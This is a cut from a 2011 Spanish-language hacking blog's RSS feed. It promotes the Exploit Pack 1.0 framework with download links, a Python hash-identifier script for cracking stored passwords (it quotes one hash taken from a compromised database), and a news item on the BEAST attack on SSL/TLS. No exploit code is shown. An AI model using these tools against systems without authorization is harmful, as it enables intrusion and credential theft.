&lt;a href="http://4.bp.blogspot.com/-Tg3VEUCy0t0/Tox4pHAXGRI/AAAAAAAAAYY/B4D-YEmsAQ0/s1600/ExploitPack.bmp" imageanchor="1" rel="lytebox" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="114" src="http://4.bp.blogspot.com/-Tg3VEUCy0t0/Tox4pHAXGRI/AAAAAAAAAYY/B4D-YEmsAQ0/s200/ExploitPack.bmp" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;Exploit Pack&lt;/span&gt; &lt;span class="hps"&gt;&lt;/span&gt;&lt;span class="hps"&gt;con una licencia&lt;/span&gt; &lt;span class="hps"&gt;GPL (código libre)&lt;/span&gt; &lt;span class="hps"&gt;y&lt;/span&gt; &lt;span class="hps"&gt;python&lt;/span&gt; &lt;span class="hps"&gt;como&lt;/span&gt; &lt;span class="hps"&gt;motor&lt;/span&gt; &lt;span class="hps"&gt;de&lt;/span&gt; &lt;span class="hps"&gt;sus módulos&lt;/span&gt;, es un compilado de exploits muy parecido a &lt;/span&gt;
  
  &lt;span id="thread_subject_site"&gt;
  Insect Pro&lt;/span&gt;&lt;span class="" id="result_box" lang="es"&gt; (al parecer es la misma iniciativa más evolucionada).&lt;br /&gt;&lt;br /&gt; &lt;span class="hps"&gt;&lt;/span&gt;Se ve bastante amable y versiones futuras promete, además que está disponible para todas los Sistemas operativos.&lt;/span&gt;&lt;/div&gt;
&lt;span class="" id="result_box" lang="es"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class="" id="result_box" lang="es"&gt;Un video de su funcionamiento:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class="" id="result_box" lang="es"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;&lt;iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/cMa2OrB7b5A" width="640"&gt;&lt;/iframe&gt;&lt;/center&gt;
&lt;span class="" id="result_box" lang="es"&gt;&amp;nbsp;&lt;span class=""&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Dowload Exploit Pack 1.0:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Nobile, Corbel, Arial, sans-serif; font-size: 11px; line-height: 17px;"&gt;&lt;a href="http://exploitpack.com/wp-content/uploads/2011/09/windows_24x24.png" style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: #225e9b; font-size: 11px; margin: 0px; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;"&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Nobile, Corbel, Arial, sans-serif; line-height: 17px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; margin-bottom: 1em; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;
&lt;strong style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; margin: 0px; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Microsoft 
Windows (&lt;/strong&gt;XP, 2003, Vista, 2008 &amp;amp; 7) :&lt;/div&gt;
&lt;div style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; margin-bottom: 1em; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;
&lt;a href="https://nodeload.github.com/exploitpack/trunk/tarball/master" style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: #225e9b; margin: 0px; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;"&gt;ExploitPack-1.0-i386.zip&lt;/a&gt; – 
Source&lt;br /&gt;&lt;a href="http://exploitpack.com/download/Exploit%20Pack%20-%20win32.zip" style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: #225e9b; margin: 0px; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;"&gt;ExploitPack 
– 1.0 win32.zip&lt;/a&gt; – Binary win32&lt;br /&gt;&lt;a href="http://exploitpack.com/download/Exploit%20Pack%20-%20win64.zip" style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: #225e9b; margin: 0px; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;"&gt;ExploitPack 
– 1.0 win64.zip&lt;/a&gt; – Binary win64&lt;/div&gt;
&lt;div style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; margin-bottom: 1em; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;
&lt;a href="http://exploitpack.com/wp-content/uploads/2011/09/linux_24x24.png" style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: #225e9b; font-size: 11px; margin: 0px; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;"&gt;&lt;img alt="" class="alignleft size-full wp-image-272" closure_uid_5iy0iw="6" height="24" src="http://exploitpack.com/wp-content/uploads/2011/09/linux_24x24.png" style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; float: left; font-size: 11px; margin: 0px 1.4em 0.4em 0px; max-width: 100%; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;" title="linux_24x24" width="24" /&gt;&lt;/a&gt;&lt;strong style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; margin: 0px; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;GNU/Linux (&lt;/strong&gt;Debian, 
Redhat, Ubuntu 2.6):&lt;/div&gt;
&lt;div style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; margin-bottom: 1em; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;
&lt;a href="https://nodeload.github.com/exploitpack/trunk/tarball/master" style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: #225e9b; margin: 0px; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;"&gt;ExploitPack-1.0-i386.tar.gz&lt;/a&gt; – 
Source&lt;/div&gt;
&lt;div style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; margin-bottom: 1em; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;
&lt;a href="http://exploitpack.com/wp-content/uploads/2011/09/macosx_24x24.png" style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: #225e9b; font-size: 11px; margin: 0px; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;"&gt;&lt;img alt="" class="alignleft size-full wp-image-273" closure_uid_5iy0iw="7" height="24" src="http://exploitpack.com/wp-content/uploads/2011/09/macosx_24x24.png" style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; float: left; font-size: 11px; margin: 0px 1.4em 0.4em 0px; max-width: 100%; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;" title="macosx_24x24" width="24" /&gt;&lt;/a&gt; &lt;strong style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; margin: 0px; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;MAC 
OS X&amp;nbsp;&lt;/strong&gt;(10.4, 10.5 and 10.6) :&lt;/div&gt;
&lt;div style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; margin-bottom: 1em; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;
&lt;a href="https://nodeload.github.com/exploitpack/trunk/tarball/master" style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: #225e9b; margin: 0px; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;"&gt;ExploitPack-1.0-i386.bzip&lt;/a&gt; – 
Source&lt;/div&gt;
&lt;div style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; margin-bottom: 1em; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;
&lt;a href="http://exploitpack.com/wp-content/uploads/2011/09/freebsd_24x24.png" style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: #225e9b; font-size: 11px; margin: 0px; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;"&gt;&lt;img alt="" class="alignleft size-full wp-image-274" closure_uid_5iy0iw="8" height="24" src="http://exploitpack.com/wp-content/uploads/2011/09/freebsd_24x24.png" style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; float: left; font-size: 11px; margin: 0px 1.4em 0.4em 0px; max-width: 100%; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;" title="freebsd_24x24" width="24" /&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="font-size: 11px;"&gt; &lt;/span&gt;&lt;strong style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; margin: 0px; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Free 
BSD &lt;/strong&gt;(7 &amp;amp; 8) :&lt;/div&gt;
&lt;div style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; margin-bottom: 1em; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;
&lt;a href="https://nodeload.github.com/exploitpack/trunk/tarball/master" style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: #225e9b; margin: 0px; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;"&gt;E&lt;/a&gt;&lt;a href="https://nodeload.github.com/exploitpack/trunk/tarball/master" style="background-clip: initial; background-color: transparent; background-origin: initial; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: #225e9b; margin: 0px; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;"&gt;xploitPack-1.0-i386.tar.gz&lt;/a&gt; – 
Source&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Web del Proyecto:&lt;/b&gt; &lt;a href="http://exploitpack.com/"&gt;http://exploitpack.com/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[+] Zion3R&lt;br /&gt;
&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-8062679806103976564?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/tA345illlW9azgPusyOKZXTJ8QA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/tA345illlW9azgPusyOKZXTJ8QA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/tA345illlW9azgPusyOKZXTJ8QA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/tA345illlW9azgPusyOKZXTJ8QA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/FlILN2ceE3M" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-10-13T18:03:12.061-03:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-Tg3VEUCy0t0/Tox4pHAXGRI/AAAAAAAAAYY/B4D-YEmsAQ0/s72-c/ExploitPack.bmp" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/10/exploit-pack-10-framework-de-exploits.html</feedburner:origLink></item><item><title>[Hash Identifier] Identifica la Encriptación de tu Hash</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/JdFEAbYZbX4/hash-identifier-identifica-la.html</link><author>noreply@blogger.com (Zion3R)</author><pubDate>Fri, 30 Sep 2011 20:32:48 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-5975289188305661360</guid><description>&lt;div style="text-align: justify;"&gt;
Hace algún tiempo&amp;nbsp; estaba haciendo auditoria a una servidor, cuando descubro una clásica SQLi, bueno... Estaban comprometidas varias Bases de Datos, en una de las cuales habian muchos usuarios y sus respectivos passwords pero lamentablemente encriptados... Aquí un ejemplo del hash (password):&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;$P$B8nRWVEezB2Qysi6gZu8GYZhXluWU0/&lt;/code&gt;&lt;/pre&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;div style="text-align: justify;"&gt;
En aquellos momentos no tenia idea con que algoritmo estaba encriptado, y me costó bastante saberlo, lo cual es sumamente necesario para poder descifrarlo con &lt;b&gt;Hashcat&lt;/b&gt; u otro... Bueno, con un poco de tiempo libre he decido hacer un pequeño &lt;b&gt;script en python &lt;/b&gt;para identificar que tipo de encriptación tienen los hashs...&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-ZzOzVoaTonk/ToaF_LjFTAI/AAAAAAAAAYU/0WeLO6opNVE/s1600/Hash_ID.png" imageanchor="1" rel="lytebox" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="504" src="http://4.bp.blogspot.com/-ZzOzVoaTonk/ToaF_LjFTAI/AAAAAAAAAYU/0WeLO6opNVE/s640/Hash_ID.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
El script puede ser muy perfeccionado aun, pero hasta el momento sirve de bastante ayuda... Los algoritmos de encriptación que identifica son:&lt;/div&gt;
&lt;span class="Apple-style-span" style="background-color: white; color: black; font-family: arial,sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul style="max-width: 62em; padding-left: 25px;"&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;ADLER-32&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;CRC-32&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;CRC-16&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;DES(Unix)&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;FCS-16&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;GHash-32-5&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;GOST R 34.11-94&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;Haval-160&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;Haval-192 110080 ,Haval-224 114080 ,Haval-256&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;Lineage II C4&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;Domain Cached Credentials&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;XOR-32&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;MD5(Half)&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;MD5(Middle)&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;MySQL&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;MD5(phpBB3)&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;MD5(Unix)&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;MD5(Wordpress)&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;MD5(APR)&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;MD2&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;MD4&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;MD5&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;MD5(HMAC(Wordpress))&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;NTLM&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;RAdmin v2.x&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;RipeMD-128&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;SNEFRU-128&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;Tiger-128&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;MySQL5 - SHA-1(SHA-1($pass))&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;MySQL 160bit - SHA-1(SHA-1($pass))&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;RipeMD-160&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;SHA-1&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;SHA-1(MaNGOS)&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;Tiger-160&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;Tiger-192&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;md5($pass.$salt) - Joomla&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;SHA-1(Django)&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;SHA-224&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;RipeMD-256&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;SNEFRU-256&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;md5($pass.$salt) - Joomla&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;SAM - (LM_hash:NT_hash)&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;SHA-256(Django)&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;RipeMD-320&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;SHA-384&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;SHA-256&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;SHA-384(Django)&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;SHA-512&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;Whirlpool&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;Entre otros...&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Tengo que ser claro que en algunos casos da muchas posibilidades de hashs ya que no se puede saber si un hash es MD5, MD5 doble, MD5(Sha1), hasta que es desencriptado.&lt;/div&gt;
&lt;br /&gt;
Aquí el proyecto:&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;a href="http://code.google.com/p/hash-identifier/" target="_blank"&gt;http://code.google.com/p/hash-identifier/&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Espero poder perfeccionar el script de modo de hacerlo lo más eficiente posible y espero su ayuda también, recibo criticas (constructivas XD) y hashs (con su respectivo algoritmo de encriptación) que no hayan sido identificados, para poder agregarlos futuramente...&lt;/div&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[+] Zion3R&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-5975289188305661360?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/uQbqVTk1PmMUgPkjLbG8ptCgCE4/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/uQbqVTk1PmMUgPkjLbG8ptCgCE4/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/uQbqVTk1PmMUgPkjLbG8ptCgCE4/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/uQbqVTk1PmMUgPkjLbG8ptCgCE4/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/JdFEAbYZbX4" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-10-01T00:32:48.120-03:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-ZzOzVoaTonk/ToaF_LjFTAI/AAAAAAAAAYU/0WeLO6opNVE/s72-c/Hash_ID.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/09/hash-identifier-identifica-la.html</feedburner:origLink></item><item><title>[BEAST] Cifrado SSL/TLS al Descubierto</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/k1BAH-kDDBg/beast-cifrado-ssltls-al-descubierto.html</link><author>noreply@blogger.com (Zion3R)</author><pubDate>Wed, 28 Sep 2011 16:35:36 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-7973026352958227180</guid><description>&lt;div style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/--HzKtXQe78A/Tn4JqFIe71I/AAAAAAAAAYQ/c8_UD-MlGfo/s1600/sneaker.gif" imageanchor="1" rel="lytebox" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/--HzKtXQe78A/Tn4JqFIe71I/AAAAAAAAAYQ/c8_UD-MlGfo/s1600/sneaker.gif" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Dos investigadores encontraron la manera de romper el cifrado SSL/TLS, utilizado para garantizar la fiabilidad y privacidad de los datos que se intercambian entre los navegadores web y los servidores.&lt;br /&gt;
&lt;br /&gt;
Las &lt;b&gt;dos últimas versiones (1.1 y 1.2) de, protocolo de cifrado TLS no son vulnerables al exploit&lt;/b&gt;, pero la mayoría de las páginas web, servicios de mensajería instantánea y VPNs está utilizando la versión 1.0, que sí es vulnerable, porque es compatible con una amplia variedad de tecnologías web.&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
A diferencia de la mayoría de los ataques publicados contra HTTPS que se centran en la autenticación adecuada de SSL, Beast ataca la confidencialidad del protocolo, &lt;a href="http://www.theregister.co.uk/2011/09/19/beast_exploits_paypal_ssl/" target="_blank"&gt;han explicado ambos investigadores a The Register&lt;/a&gt;, que aseguran además que BEAST implementa el primer ataque que actualmente descifra peticiones HTTPS.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;a href="http://segu.info/sslb" target="_blank"&gt;En este paper&lt;/a&gt; [RAR]&lt;/b&gt; desarrollado por &lt;b&gt;Thai Duong&lt;/b&gt; y &lt;b&gt;Juliano Rizzo&lt;/b&gt; presenta el ataque chosen-plaintext contra &lt;b&gt;SSL 3.0&lt;/b&gt; y &lt;b&gt;TLS 1.0&lt;/b&gt; que permitió a sus autores desarrollar la aplicación BEAST, presentada ayer viernes en &lt;a href="http://ekoparty.org/eng/2011/juliano-rizzo.php" target="_blank"&gt;Ekoparty&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
El paper además describe y presenta &lt;b&gt;BEAST&lt;/b&gt;, que permite a un atacante descifrar y obtener los tokens de autenticación embebidos en el tráfico HTTPS. La obra resultante trabaja sobre los navegadores web más importantes al momento de escribir el trabajo en mayo de 2011.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Referencias:&lt;/b&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://datacenteroverlords.com/2011/09/22/beast-slayed-ssl/" target="_blank"&gt;http://datacenteroverlords.com/2011/09/22/beast-slayed-ssl/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.theregister.co.uk/2011/09/19/beast_exploits_paypal_ssl/" target="_blank"&gt;http://www.theregister.co.uk/2011/09/19/beast_exploits_paypal_ssl/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.theregister.co.uk/2011/09/21/google_chrome_patch_for_beast/" target="_blank"&gt;http://www.theregister.co.uk/2011/09/21/google_chrome_patch_for_beast/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Fuente:&lt;/b&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://blog.segu-info.com.ar/2011/09/rompen-el-cifrado-ssltls-y-chrome-dice.html" target="_blank"&gt;http://blog.segu-info.com.ar/2011/09/rompen-el-cifrado-ssltls-y-chrome-dice.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://blog.segu-info.com.ar/2011/09/descarga-beast-para-descifrar-ssl.html" target="_blank"&gt;http://blog.segu-info.com.ar/2011/09/descarga-beast-para-descifrar-ssl.html&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
--------------------------------------------------- EDIT ---------------------------------------------------&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
Acá un video del funcionamiento de BEAST:&lt;/div&gt;
&lt;br /&gt;
